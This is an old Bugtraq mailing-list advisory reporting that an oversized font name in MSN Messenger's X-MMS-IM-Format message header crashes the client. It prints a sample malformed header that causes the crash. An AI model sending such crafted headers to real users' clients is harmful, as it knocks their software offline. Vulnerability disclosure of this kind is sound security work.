[25371] in bugtraq
Misformated message header causes msn messenger to crash
daemon@ATHENA.MIT.EDU (underdoc@pandora.be)
Mon May 6 15:08:54 2002
Date: 6 May 2002 15:04:13 -0000
Message-ID: <20020506150413.18983.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: <underdoc@pandora.be>
To: bugtraq@securityfocus.com
Introduction to the flaw.
Msn Messenger is a popular Instant-Messaging client from
Microsoft. After the previous flaws regarding the privacy
of users another flaw is discovered. This flaw makes the
msn messenger client crash after receiving a misformated
font variable in the message header with instant messages.
How does it work exactly?
The Msn Messenger client works by sending a header with
every message. So every time a user wants to send a
message, it generates a header, containing information
about the font, the color of the message and some other
information.
The flaw
A normal header look something like this:
<start>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0;
PF=22
hey friend, how are you?
<end>
When we replace the font field with something very large.
Creating an overflaw the header will look like this:
<start>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=Times%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
%20New%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20
Roman%20%20%20%20%20%20%20%20%20%20%20; EF=B; CO=ff; CS=0;
PF=22
hey friend, how are you?
<end>
As a result the Msn Messenger client will crash
this flaw only crashes the Msn Messenger from Microsoft.
Trillian is not affected.
This flaw is a severe danger. As it's not so hard for
hackers to use this flaw in their application.
Microsoft has been informed on this issue.
